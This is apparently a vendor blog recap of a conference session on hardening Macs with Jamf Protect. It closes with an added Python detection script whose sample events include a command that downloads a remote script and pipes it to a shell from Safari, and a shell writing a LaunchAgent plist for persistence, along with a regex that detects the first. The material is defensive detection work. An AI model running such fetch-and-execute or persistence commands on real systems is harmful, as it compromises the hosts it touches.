Practical Mac security
Get actionable insights to secure your Mac fleet and defend it from current and growing threats.

The Mac threat landscape
In this JNUC session, Jamf Product Owners Kari Lundberg and Matt Taylor give us practical tips for our Mac security journey, especially when using Jamf Protect. To begin, they describe the current threat landscape affecting Macs.
With the increase in remote work comes an increase in the attack surface that puts data security at risk. Contrary to old beliefs that Macs don’t get viruses, Macs are increasingly targeted as their presence at work grows.
Mac malware has evolved too, with attackers deploying more aggressive and dangerous tactics such as cryptojacking, infostealers and commodity malware. Users are also exposed to malicious advertising in the browser, to dangerous torrented apps and to spearphishing campaigns.
Endpoint hardening
Defending against these threats requires — among other strategies — hardening your endpoints. As they describe in their presentation, endpoint hardening involves “applying a series of best practices, configurations and security measures” to reduce vulnerabilities on the device. Or, as Taylor summarizes it, making your device more expensive to breach than the devices around it.
Taylor and Lundberg focus on three key strategies that the audience can implement with minimal overhead.
Attack surface reduction
Their first strategy is to reduce your attack surface by mitigating vulnerabilities. They recommend the following layers of defense:
- Platform app security: Security tools and features are built right into macOS; these provide a strong foundation against many common malware strains.
- Block risky websites: Using content filtering tools and enforcing acceptable use policies prevents users from accessing malicious websites. Security software like Jamf Protect blocks malicious traffic at the network level — preventing attacks across all apps.
- Patch software: Updating your software to the latest version ensures it has the most up-to-date security patches. Prioritizing highly targeted and/or high-risk software lowers the chance of a successful attack.
- Control hardware devices: Curiosity can lead users to do things like plug a stray USB drive into their device to find its owner. Attackers know this and will plant drives as a means of exploitation. Restricting external device access can protect against these threats, and limiting devices to read-only can stop inbound process execution.
Advanced threat protection
Bad actors are using increasingly sophisticated attack methods that can evade detection. As Lundberg and Taylor discuss in their presentation, that’s why it’s critical to:
Block web-based threats
90% of successful attacks start with phishing. Blocking access to phishing websites/attempts can stop attackers from reaching the device in the first place. And this content filtering can disrupt contact with a command and control server and prevent data exfiltration.
Block malicious software
If/when malware ends up on a device, its execution must be prevented. Jamf Protect runs on industry-leading threat intelligence to stop malware from launching on your system. This malware may be potentially unwanted apps, commodity malware, advanced persistent threats or more. Your detection software must be able to detect these threats, whether they are known and listed in a database, or novel.
Block malicious behavior
Living-off-the-land attacks rely on built-in macOS software for their success. Since these use legitimate tools and don’t install malicious files that can be detected, they have to be identified by their behavior. Jamf Protect can recognize suspicious behavior and automatically block and report the device.
Accelerating investigations
To prevent an attack from happening again, you have to understand its full nature and scope. IT and security teams need access to telemetry data to gain this insight, like:
- Apps and processes
- Persistence
- Command line activity
- System logs
- And more
Jamf Protect provides this data and pairs it with SIEM integrations like Splunk, Microsoft Sentinel and others — so admins can get the information they need to keep their fleet protected.
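As an added example (not code from the session, from Jamf Protect or from any SIEM vendor), the following Python script applies behavior-based rules of the kind described under “Block malicious behavior” to the telemetry fields listed above: process, parent, command line and persistence writes. The sample events, the baseline lists of interpreters and user-facing apps, and every path, hostname and plist name in it are constructed for illustration.

```python
"""Behavior-based triage of constructed macOS process telemetry.

Added example, not Jamf Protect's code. It shows why living-off-the-land
activity has to be judged by behavior: every binary involved (sh, curl,
cp) ships with macOS, so a file-hash database has nothing to match. The
telemetry fields the session lists (process, parent, command line,
persistence writes) are what carry the signal.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
import re


@dataclass
class ProcessEvent:
    pid: int
    parent: str                 # image name of the parent process
    image: str                  # path of the executable that ran
    cmdline: str                # full command line as recorded
    written_paths: List[str] = field(default_factory=list)  # files the process wrote


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


# Assumed baseline, constructed for this example (not a vendor list).
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3"}
USER_FACING_PARENTS = {"Safari", "Google Chrome", "Microsoft Word", "Preview", "Mail"}
PERSISTENCE_MARKERS = ("/Library/LaunchAgents/", "/Library/LaunchDaemons/")

# Remote content handed straight to a shell never lands on disk as a scannable
# file, which is exactly what file-based detection misses.
DOWNLOAD_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")


def rule_download_piped_to_shell(ev: ProcessEvent) -> Optional[Finding]:
    if DOWNLOAD_TO_SHELL.search(ev.cmdline):
        return Finding(ev.pid, "download_piped_to_shell", ev.cmdline)
    return None


def rule_interpreter_from_user_app(ev: ProcessEvent) -> Optional[Finding]:
    # A browser or document viewer does not normally need a shell child.
    if ev.image in INTERPRETERS and ev.parent in USER_FACING_PARENTS:
        return Finding(ev.pid, "interpreter_spawned_by_user_app", f"{ev.parent} -> {ev.image}")
    return None


def rule_persistence_by_interpreter(ev: ProcessEvent) -> Optional[Finding]:
    # Launch agents/daemons written by a shell rather than an installer are a
    # common persistence step; the write itself is the observable.
    if ev.image in INTERPRETERS:
        hits = [p for p in ev.written_paths if any(m in p for m in PERSISTENCE_MARKERS)]
        if hits:
            return Finding(ev.pid, "persistence_written_by_interpreter", ", ".join(hits))
    return None


RULES = (rule_download_piped_to_shell, rule_interpreter_from_user_app, rule_persistence_by_interpreter)


def triage(events: List[ProcessEvent]) -> List[Finding]:
    """Run every rule over every event; a single event may trigger several rules."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


def rules_by_pid(findings: List[Finding]) -> Dict[int, List[str]]:
    """Group triggered rule names by process, the shape an analyst wants in a SIEM view."""
    out: Dict[int, List[str]] = {}
    for f in findings:
        out.setdefault(f.pid, []).append(f.rule)
    return out


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ProcessEvent(401, "Terminal", "/bin/zsh", "zsh -c 'brew update'"),
    ProcessEvent(512, "Safari", "/bin/sh",
                 "sh -c 'curl -fsSL http://update.example.invalid/setup.sh | sh'"),
    ProcessEvent(520, "sh", "/bin/bash",
                 "bash -c 'cp /tmp/helper.plist ~/Library/LaunchAgents/com.example.helper.plist'",
                 ["/Users/alice/Library/LaunchAgents/com.example.helper.plist"]),
    # A package installer writing a daemon plist is the legitimate counterpart and stays quiet.
    ProcessEvent(600, "Installer", "/usr/sbin/installer",
                 "installer -pkg /tmp/Vendor.pkg -target /",
                 ["/Library/LaunchDaemons/com.vendor.helper.plist"]),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

The point of the fourth event is the caveat a practitioner cares about: the same persistence path is written by an installer and by a shell, and only the process context separates routine software deployment from something to investigate. Rules like these are a starting point for tuning, not a finished detection set.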
Key takeaways
Taylor and Lundberg leave us with these key takeaways:
- Built-in security is a strong foundation, but it’s just the starting point.
- As threat actors focus more on Mac, so should you and your security tools.
- Patch your software.